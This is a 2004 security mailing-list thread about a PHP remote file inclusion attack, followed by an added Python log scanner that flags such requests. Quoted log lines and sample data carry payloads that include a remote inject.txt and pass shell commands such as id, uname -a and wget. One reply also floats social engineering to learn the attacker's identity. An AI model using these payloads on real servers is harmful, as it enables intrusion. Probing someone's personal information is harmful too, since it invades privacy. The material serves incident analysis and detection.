Re: Hack attempt

Hi Norbert/Alvin

As I already explained in private to Norbert, this is just a guy of DALnet
Network playing with some exploit for PHP. In fact he installed eggdrop and
psybnc which are not related to clones attack at all. He's probably just a
kid with some automated script or some "l33t" tool to own unpatched boxes.

Anyway, why take off wget and other useful binaries? I would suggest
instead fully patching your box and maybe installing Snort.

I don't agree with the "smart people investigating for what's cooking". I
think chkrootkit can help and can spare a lot of time. Of course you
shouldn't base your security on this software only but it's a good help.
Snort and Tripwire are definitely a good help too.

As I said, it's not a clones-derived attack. It's just a chatting kid who
probably is trying to build up his own Botnet to look l33t with his mates.

Again I don't agree with the "another cracked box". In fact the whois made
by Norbert on my suggestion gave good results. The provider hosting his
website (yes, that is his own personal website.... not very smart eh?!) has
deleted the inject.txt script and gave a warning to this guy who will
probably be scared to death (this depends on how old he is and other factors).
Moreover we know his nickname and we know he's chatting on Dalnet so....
some social engineering could even lead to personal information on this
kid.

Anyway... Norbert, patch your box on any PHP bug (there are tons of PHP bugs
as far as I know) and then try to use SATAN or NESSUS to check your box (I
personally suggest Nessus). Oh... just one last but not least thing:

don't forget to wipe your box 'cause you will never know what he did for
real so it's much safer to reinstall everything. I know it's boring but
it's the only SECURE way to know your box is clean.

Hope this can help others with the same problem.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com

From: Alvin Oga <alvin.sec@Virtual.Linux-Consulting.com>
To: norbert.crettol@idiap.ch (Norbert Crettol)
cc: focus-linux@securityfocus.com
Subject: Re: Hack attempt
Date: 23/07/2004 01.23

hi norbert

> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

time for you to patch and update to latest php
or better still, turn it off esp if you don't need it

tons of things to fix up ... to harden the server

> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget

time to remove wget, lynx, and equiv apps

> Has someone seen this kind of attack ?

it's either eggdrop or modified clones/derivatives

> (chkrootkit doesn't detect it).

so much for chkrootkit :-)

smart/intelligent people investigating for "what's cooking" is better
than automated tools

> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> uploaded scripts.

probably another cracked box ... long list to follow to find the
actual cracker

c ya
alvin
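The request quoted above is a classic PHP remote file inclusion (RFI) probe: a script parameter pointing at a remote URL (with a trailing "?" so the rest of the include path is swallowed as a query string), plus a second parameter carrying a shell command for the fetched script to run. The following is an added example, not code from anyone in this thread, that walks Apache combined-format access log lines and flags requests whose query string carries a remote URL; the log lines and the host remote.example are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A parameter value that is itself a URL is the signature of an RFI attempt.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def parse_line(line):
    """Split one access log line into its fields, or None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_rfi(line):
    """Return a finding for a request whose query carries a remote URL, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well as plain http://.
    # keep_blank_values keeps the trailing '?' trick (inject.txt?) visible in the value.
    params = parse_qsl(parts.query, keep_blank_values=True)
    remote = [(k, v) for k, v in params if REMOTE_SCHEME_RE.match(v)]
    if not remote:
        return None
    param, url = remote[0]
    return {
        "client": rec["client"],
        "script": parts.path,                 # the local script being abused
        "param": param,                       # the parameter that took a URL
        "remote_host": urlsplit(url).hostname or "",
        "other_params": {k: v for k, v in params if k != param},  # e.g. cmd=id
        "status": int(rec["status"]),         # 200 means the include probably worked
    }

def scan_log(lines):
    """Run find_rfi over every line and collect the hits, in log order."""
    return [f for f in (find_rfi(l) for l in lines) if f]

# Constructed sample log, modelled on the request shown in the thread (placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jul/2004:01:02:03 +0200] "GET /vuln.php?bodyfile=http://remote.example/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '203.0.113.7 - - [23/Jul/2004:01:02:09 +0200] "GET /vuln.php?bodyfile=http%3A%2F%2Fremote.example%2Finject.txt%3F&cmd=uname%20-a HTTP/1.0" 200 6701 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '198.51.100.4 - - [23/Jul/2004:01:05:00 +0200] "GET /index.php?page=about&ref=http://www.example.org/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [23/Jul/2004:01:06:00 +0200] "GET /index.php?page=about HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]
```

A remote URL in any parameter is only a signal to review (the third sample line is a legitimate referrer-style parameter); the combination of a URL value, a command-like sibling parameter such as cmd, and a 200 response is what deserves an immediate look.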